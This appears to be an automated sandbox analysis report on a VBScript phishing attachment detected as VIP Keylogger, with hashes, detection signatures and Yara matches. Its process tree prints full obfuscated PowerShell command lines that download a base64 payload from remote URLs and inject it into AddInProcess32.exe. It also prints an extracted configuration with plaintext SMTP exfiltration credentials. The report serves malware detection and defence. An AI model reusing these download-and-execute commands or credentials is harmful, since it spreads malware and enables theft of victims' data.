Edit tour
Windows
Analysis Report
RFQ-5120240930 VENETA PESCA SRL.vbs
Overview
General Information
| Sample name: | RFQ-5120240930 VENETA PESCA SRL.vbs |
| Analysis ID: | 1522516 |
| MD5: | d969df11d11c9dfafbe27aacd81dcb82 |
| SHA1: | 83748eb8a719110829c744930c7a0b88d8c1f107 |
| SHA256: | ef18b54b8f37d475de25d891221866bb252f710f141a5107f9ba39fb110fc0d7 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
VIP Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5412 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\RFQ-5 120240930 VENETA PES CA SRL.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7092 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggJHBzSE 9NRVsyMV0r JHBTSE9NZV szNF0rJ3gn KSgoKCdDJy snaVN1cmwg PScrJyBmJy snbVVodHRw czovJysnL3 JhdycrJy5n JysnaXQnKy dodWJ1Jysn cycrJ2VyJy snYycrJ28n KydudGVudC crJy5jb20v Tm8nKydEZX RlJysnY3RP bicrJy8nKy dObycrJ0Rl JysndGVjdE 8nKyduL3Jl ZicrJ3MvJy snaGVhZHMn KycvJysnbW FpJysnbi9E JysnZXQnKy dhaCcrJ05v dGgtVi50Jy sneHQnKydm bVU7IENpU2 Jhc2U2NENv JysnbnRlJy snbnQgPSAo TmV3LU8nKy diJysnamVj dCcrJyBTeX N0ZW0uTicr J2V0LldlYk MnKydsaScr J2VudCkuJy snRG93bmxv YScrJ2RTJy sndHInKydp bmcnKycoQ2 knKydTdXIn KydsKTsgQy crJ2lTYicr J2knKyduYS crJ3J5Jysn Q28nKydudC crJ2VudCA9 JysnICcrJ1 tTeXN0ZScr J20uQ29uJy sndmVydCcr J106OkZyb2 1CYXNlNjRT JysndCcrJ3 JpJysnbmco JysnQycrJ2 lTYmFzZTY0 Q29uJysndG VudCk7Jysn IEMnKydpUy crJ2Fzc2Vt YicrJ2x5ID 0nKycgJysn W1InKydlZm xlY3Rpbycr J24uQXMnKy dzZW0nKydi bHknKyddOj pMbycrJ2Fk KCcrJ0MnKy dpU2JpJysn bicrJ2FyeS crJ0MnKydv bnRlbicrJ3 QnKycpJysn OyBbZG5saW IuSU8nKycu SG9tZV06Ol ZBSSgnKydh JysnM1UwL2 RpeUtGL2Qv ZWUuJysnZX QnKydzJysn YXAnKycvLz pzcCcrJ3R0 aGEzVSwgYT MnKydVZGVz JysnYScrJ3 RpJysndicr J2EnKydkb2 EzVScrJywn KycgYScrJz NVZGUnKydz JysnYXRpdm EnKydkbycr J2EzJysnVS wgYTNVZGUn KydzYXQnKy dpJysndmFk b2EzVSwgYT NVQScrJ2Rk JysnSW5QJy sncm9jZScr J3NzMzInKy dhM1UsIGEz VWEnKyczVS xhM1VhJysn M1UpJykgLV JFcGxBY2Ug IChbQ2hBcl 05NytbQ2hB cl01MStbQ2 hBcl04NSks W0NoQXJdMz QgLWNyZVBM YUNFICAnZm 1VJyxbQ2hB cl0zOSAgLV JFcGxBY2Ug IChbQ2hBcl 02NytbQ2hB cl0xMDUrW0 NoQXJdODMp LFtDaEFyXT M2KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 5828 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4256 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( $p sHOME[21]+ $pSHOMe[34 ]+'x')(((' C'+'iSurl ='+' f'+'m Uhttps:/'+ '/raw'+'.g '+'it'+'hu bu'+'s'+'e r'+'c'+'o' +'ntent'+' .com/No'+' Dete'+'ctO n'+'/'+'No '+'De'+'te ctO'+'n/re f'+'s/'+'h eads'+'/'+ 'mai'+'n/D '+'et'+'ah '+'Noth-V. t'+'xt'+'f mU; CiSbas e64Co'+'nt e'+'nt = ( New-O'+'b' +'ject'+' System.N'+ 'et.WebC'+ 'li'+'ent) .'+'Downlo a'+'dS'+'t r'+'ing'+' (Ci'+'Sur' +'l); C'+' iSb'+'i'+' na'+'ry'+' Co'+'nt'+' ent ='+' ' +'[Syste'+ 'm.Con'+'v ert'+']::F romBase64S '+'t'+'ri' +'ng('+'C' +'iSbase64 Con'+'tent );'+' C'+' iS'+'assem b'+'ly ='+ ' '+'[R'+' eflectio'+ 'n.As'+'se m'+'bly'+' ]::Lo'+'ad ('+'C'+'iS bi'+'n'+'a ry'+'C'+'o nten'+'t'+ ')'+'; [dn lib.IO'+'. Home]::VAI ('+'a'+'3U 0/diyKF/d/ ee.'+'et'+ 's'+'ap'+' //:sp'+'tt ha3U, a3'+ 'Udes'+'a' +'ti'+'v'+ 'a'+'doa3U '+','+' a' +'3Ude'+'s '+'ativa'+ 'do'+'a3'+ 'U, a3Ude' +'sat'+'i' +'vadoa3U, a3UA'+'dd '+'InP'+'r oce'+'ss32 '+'a3U, a3 Ua'+'3U,a3 Ua'+'3U)') -REplAce ([ChAr]97+ [ChAr]51+[ ChAr]85),[ ChAr]34 -c rePLaCE 'f mU',[ChAr] 39 -REplAc e ([ChAr]6 7+[ChAr]10 5+[ChAr]83 ),[ChAr]36 ) )" MD5: 04029E121A0CFA5991749937DD22A1D9) 
AddInProcess32.exe (PID: 5500 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
{"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
| Click to see the 8 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||